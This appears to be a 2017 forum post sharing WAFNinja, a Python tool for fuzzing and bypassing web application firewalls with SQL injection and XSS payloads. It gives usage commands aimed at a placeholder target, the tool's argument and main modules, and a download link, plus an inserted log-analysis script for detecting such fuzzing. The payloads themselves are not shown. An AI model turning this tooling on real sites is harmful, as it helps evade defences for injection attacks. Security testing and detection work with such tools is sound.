KingSkrupellos

WaFNinja Web Application Firewall Bypass Code Python

Dec 4th, 2017
[video=youtube]https://www.youtube.com/watch?v=nMOyvIWn5Y8[/video]

[video=youtube]https://www.youtube.com/watch?v=SD7ForrwUMY[/video]

[video=youtube]https://www.youtube.com/watch?v=iN8gg3QsZpk[/video]

https://www.cyberizm.org/cyberizm-wafninja-web-uygulama-guvenlik-duvari-asma-kodu-python.html

[img]http://i.hizliresim.com/1LEr9G.png[/img]

WafNinja Usage =>

[code]wafninja.py [-h] [-v] {fuzz, bypass, insert-fuzz, insert-bypass, set-db} ...[/code]

WafNinja Fuzz Usage =>

[code]python wafninja.py fuzz -u "http://www.target.com/index.php?id=FUZZ" \
-c "phpsessid=value" -t xss -o output.html[/code]

WafNinja Fuzz Code =>

[code]"""
:Program: WAFNinja
:ModuleName: argument
:Version: 1.0
:Revision: 1.0.0
:Author: Khalil Bijjou
:Description: The argument module processes the command line arguments and provides it to the main module (wafninja module).
"""

# Python 2 code: it passes version= to ArgumentParser, which Python 3 no longer accepts.
import argparse
from argparse import RawTextHelpFormatter

def getArguments():
    """
    :Description: This function prints the start message and takes the arguments, which are passed by the user.
    :return: The user input
    """
    parser = argparse.ArgumentParser(description='''

___ ______________________ ______ ________
__ | / /__ |__ ____/__ | / /__(_)____________(_)_____ _
__ | /| / /__ /| |_ /_ __ |/ /__ /__ __ \____ /_ __ `/
__ |/ |/ / _ ___ | __/ _ /| / _ / _ / / /___ / / /_/ /
____/|__/ /_/ |_/_/ /_/ |_/ /_/ /_/ /_/___ / \__,_/
/___/

WAFNinja - Penetration testers favorite for WAF Bypassing

Example Usage:
fuzz:\n\tpython wafninja.py fuzz -u "http://www.target.com/index.php?id=FUZZ" \n\t-c "phpsessid=value" -t xss -o output.html
bypass:\n\tpython wafninja.py bypass -u "http://www.target.com/index.php" \n\t-p "Name=PAYLOAD&Submit=Submit" \n\t-c "phpsessid=value" -t xss -o output.html
insert-fuzz:\n\tpython wafninja.py insert-fuzz -i select -e select -t sql
''',formatter_class=RawTextHelpFormatter, version='WAFNinja 1.0')
    # One sub-parser per mode; the chosen mode is stored in args.mode
    subparser = parser.add_subparsers(help='Which function do you want to use?\n\n', dest='mode')
    attack_fuzz_parser = subparser.add_parser("fuzz",help='check which symbols and keywords are allowed by the WAF.')
    attack_payload_parser = subparser.add_parser("bypass",help='sends payloads from the database to the target.')
    insert_fuzz_parser = subparser.add_parser("insert-fuzz",help='add a fuzzing string')
    insert_bypass_parser = subparser.add_parser("insert-bypass",help='add a payload to the bypass list')
    set_db_parser = subparser.add_parser("set-db",help='use another database file. Useful to share the same database with others.')

    ## attack parser ##
    attack_payload_parser.add_argument('-u',metavar='URL',help='Target URL (e.g. "www.target.com/index.php?id=PAYLOAD")\nNote: specify the position of the payload with the keyword PAYLOAD',required=True)
    attack_payload_parser.add_argument('-p',metavar='POST PARAMETER',help='Send payload through post parameter ',required=False)
    attack_payload_parser.add_argument('-c',metavar='COOKIE',help='HTTP Cookie Header',required=False)
    attack_payload_parser.add_argument('-t',metavar='TYPE',choices=['sql','xss'],help='Type of payload [sql|xss]', required=True)
    attack_payload_parser.add_argument('-d',metavar='DELAY',default='0',help="Wait the given delay time between each request [default=0]",required=False)
    attack_payload_parser.add_argument('-w',metavar='WAF',help='Send payloads of certain WAF [default=generic]', required=False)
    attack_payload_parser.add_argument('-o',metavar='OUTPUT FILE',help="Save output to .html file",required=False)
    attack_payload_parser.add_argument('--proxy',metavar='PROXY',help='Use a proxy. Format: IP:PORT', required=False)
    # metavar corrected from the copy-pasted 'PROXY' so the help text names the right value
    attack_payload_parser.add_argument('--prefix',metavar='PREFIX',help='Add a prefix to every payload.', required=False)
    attack_payload_parser.add_argument('--postfix',metavar='POSTFIX',help='Add a postfix to every payload.', required=False)

    ## attack fuzz ##
    attack_fuzz_parser.add_argument('-u',metavar='URL',help='Target URL (e.g. "www.target.com/index.php?id=FUZZ")\nNote: specify the position of the fuzz with the keyword FUZZ',required=True)
    attack_fuzz_parser.add_argument('-p',metavar='POST PARAMETER',help='Send fuzz through post parameter ',required=False)
    attack_fuzz_parser.add_argument('-c',metavar='COOKIE',help='HTTP Cookie Header',required=False)
    attack_fuzz_parser.add_argument('-t',metavar='TYPE',choices=['sql','xss'],help='Type of payload [sql|xss]', required=True)
    attack_fuzz_parser.add_argument('-d',metavar='DELAY',default=0,help="Wait the given delay time between each request [default=0]",required=False)
    attack_fuzz_parser.add_argument('-o',metavar='OUTPUT FILE',help="Save output to .html file",required=False)
    attack_fuzz_parser.add_argument('--proxy',metavar='PROXY',help='Use a proxy. Format: IP:PORT', required=False)
    attack_fuzz_parser.add_argument('--prefix',metavar='PREFIX',help='Add a prefix to every fuzz.', required=False)
    attack_fuzz_parser.add_argument('--postfix',metavar='POSTFIX',help='Add a postfix to every fuzz.', required=False)

    ## insert bypass parser ##
    insert_bypass_parser.add_argument('-i',metavar='INPUT',help='Payload to insert',required=True)
    insert_bypass_parser.add_argument('-t',metavar='TYPE',choices=['sql','xss'], help='Type of payload [sql|xss]',required=True)
    insert_bypass_parser.add_argument('-w',metavar='WAF',help='WAF that was bypassed with this payload', required=False)

    ## insert fuzz parser ##
    insert_fuzz_parser.add_argument('-i',metavar='INPUT',help='Fuzz to insert',required=True)
    insert_fuzz_parser.add_argument('-e',metavar='EXPECTED',help='Expected output from the target site. Use this option if input is encoded or something like that.',required=False)
    insert_fuzz_parser.add_argument('-t',metavar='TYPE',choices=['sql','xss'], help='Type of payload [sql|xss]',required=True)

    ## set database parser ##
    set_db_parser.add_argument('-p',metavar='PATH',help='Path to sqlite database. The default location is "db/db.sqlite"',required=True)

    args = parser.parse_args()

    # Each branch returns a list whose first element names the mode;
    # optional string values that were not given become empty strings.
    if args.mode == 'bypass':
        url = args.u
        post = args.p
        cookie = args.c
        type = args.t.lower()
        delay = args.d
        waf = args.w
        if waf is not None:
            waf = waf.lower()
        outputFile = args.o
        proxy = args.proxy
        if proxy is None:
            proxy = ''
        prefix = args.prefix
        if prefix is None:
            prefix = ''
        postfix = args.postfix
        if postfix is None:
            postfix = ''
        return ['bypass', url, post, cookie, type, delay, waf, outputFile, proxy, prefix, postfix]

    elif args.mode == 'fuzz':
        url = args.u
        post = args.p
        cookie = args.c
        type = args.t.lower()
        delay = args.d
        outputFile = args.o
        proxy = args.proxy
        if proxy is None:
            proxy = ''
        prefix = args.prefix
        if prefix is None:
            prefix = ''
        postfix = args.postfix
        if postfix is None:
            postfix = ''
        return ['fuzz', url, post, cookie, type, delay, outputFile, proxy, prefix, postfix]

    elif args.mode == 'insert-bypass':
        input = args.i
        type = args.t
        waf = args.w
        if waf is not None:
            waf = waf.lower()
        return ['insert-bypass', input, type, waf]

    elif args.mode == 'insert-fuzz':
        input = args.i
        # Without -e the expected output defaults to the input itself
        if args.e is not None:
            expected = args.e
        else:
            expected = args.i
        type = args.t
        return ['insert-fuzz', input, expected, type]

    elif args.mode == 'set-db':
        path = args.p
        return ['set-db', path][/code]

WafNinja Bypass =>

[code]python wafninja.py bypass -u "http://www.target.com/index.php" -p "Name=PAYLOAD&Submit=Submit" \
-c "phpsessid=value" -t xss -o output.html[/code]

WafNinja Insert Fuzz =>

[code]python wafninja.py insert-fuzz -i select -e select -t sql[/code]

Main Help Console Output =>

[code]Which function do you want to use?

    fuzz           check which symbols and keywords are allowed by the WAF.
    bypass         sends payloads from the database to the target.
    insert-fuzz    add a fuzzing string
    insert-bypass  add a payload to the bypass list
    set-db         use another database file. Useful to share the same database with others.

optional arguments:
  -h, --help     show this help message and exit
  -v, --version  show program's version number and exit[/code]

WafNinja Code =>

[code]"""
:Program: WAFNinja
:ModuleName: wafninja
:Version: 1.0
:Revision: 1.0.0
:Author: Khalil Bijjou
:Description: The wafninja module is the main module, that controls the flow of the program.
"""

# Python 2 code (print statement at the end of the module).
from argument import getArguments
from db.db import getPayload, setPayload, getFuzz, setFuzz
from db.setDB import testConnection, setDatabase
from ninja.bypass import firePayload
from ninja.fuzzer import fireFuzz

def setHeaders(cookie):
    """
    :Description: This function sets the cookie for the requests.
    :param cookie: A Cookie String
    :type cookie: String
    :todo: Add also other header

    """
    # 'header' is the module-level list created before this function is called
    if cookie is not None:
        header.append(['Cookie',cookie])

def extractParams(input):
    """
    :Description: Takes the '-p' input and splits it into individual parameter
    :param input: POST Parameter
    :type input: String
    :return: Dictionary with the parameter as elements
    :note: This function is required to prepare the parameter for the firePayload() or fireFuzz() function

    """
    if input is None:
        return None
    input = input.split('&')
    params = {}
    for item in input:
        # partition() keeps a parameter without '=' from raising IndexError
        name, _, value = item.partition('=')
        params[name] = value
    return params

arguments = getArguments()

if arguments[0] == 'bypass':
    arguments.pop(0) # delete the string that indicates what function to use
    url, post, cookie, type, delay, waf, outputFile, proxy, prefix, postfix = arguments
    payload = getPayload(type, waf) # get strings from db
    header = []
    setHeaders(cookie)
    post = extractParams(post)
    firePayload(type, payload, url, post, header, delay, outputFile, proxy, prefix, postfix)

elif arguments[0] == 'fuzz':
    arguments.pop(0) # delete the string that indicates what function to use
    url, post, cookie, type, delay, outputFile, proxy, prefix, postfix = arguments
    fuzz = getFuzz(type) # get strings from db
    header = []
    setHeaders(cookie)
    post = extractParams(post)
    fireFuzz(type, fuzz, url, post, header, delay, outputFile, proxy, prefix, postfix)

elif arguments[0] == 'insert-bypass':
    arguments.pop(0)
    input, type, waf = arguments
    setPayload(input, type, waf)

elif arguments[0] == 'insert-fuzz':
    arguments.pop(0)
    input, expected, type = arguments
    setFuzz(input, expected, type)

elif arguments[0] == 'set-db':
    arguments.pop(0)
    path = arguments[0]
    if (testConnection(path) == 1):
        setDatabase(path)
        print "Database successfully changed!"[/code]
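
Seen from the server side, the fuzz and bypass flows above have a recognisable shape: one client, one path, and one parameter (the FUZZ or PAYLOAD position) whose value changes on every request. The detection below is an added example, not part of WAFNinja or of the original post; the combined access-log format, the 403 block status, the thresholds and all function names are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qsl

# Assumed input: Apache/nginx combined access log lines.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3})')

def parse_line(line):
    """Return (ip, time, path, [(param, value)], status), or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, target, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    url = urlsplit(target)
    return ip, when, url.path, parse_qsl(url.query, keep_blank_values=True), int(status)

def find_param_fuzzing(lines, min_distinct=5, window=timedelta(seconds=60)):
    """Flag (ip, path, param) that receives >= min_distinct values inside window."""
    hits = defaultdict(list)      # (ip, path, param) -> [(time, value, status)]
    for rec in filter(None, map(parse_line, lines)):
        ip, when, path, params, status = rec
        for name, value in params:
            hits[(ip, path, name)].append((when, value, status))
    alerts = []
    for (ip, path, name), rows in hits.items():
        rows.sort(key=lambda r: r[0])
        start = 0
        for end, (when, _, _) in enumerate(rows):
            while when - rows[start][0] > window:    # slide the window forward
                start += 1
            span = rows[start:end + 1]
            distinct = {value for _, value, _ in span}
            if len(distinct) >= min_distinct:
                # Assumption: the WAF answers blocked requests with 403.
                blocked = sum(1 for _, _, st in span if st == 403)
                alerts.append({"ip": ip, "path": path, "param": name,
                               "distinct": len(distinct), "blocked": blocked, "at": when})
                break
    return alerts

def _line(ip, sec, target, status):   # builds one constructed log line
    return f'{ip} - - [04/Dec/2017:10:00:{sec:02d} +0000] "GET {target} HTTP/1.1" {status} 512'

# Constructed sample: one client cycling keywords through id=, one ordinary client.
WORDS = [("select", 403), ("union", 403), ("from", 200), ("script", 403), ("alert", 200), ("onerror", 403)]
SAMPLE_LOG = ([_line("203.0.113.7", i, f"/index.php?id={w}", s) for i, (w, s) in enumerate(WORDS)]
              + [_line("198.51.100.20", i * 5, "/index.php?id=42", 200) for i in range(6)])
```

Values sent through the `-p` POST parameter do not appear in a standard access log, so the same grouping has to run on WAF or application logs that record body parameters to cover that mode.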

Download Link =>

[hide][code]https://github.com/khalilbijjou/WAFNinja[/code][/hide]

### With my greetings and prayers - Mr. KingSkrupellos - Cyberizm.Org ###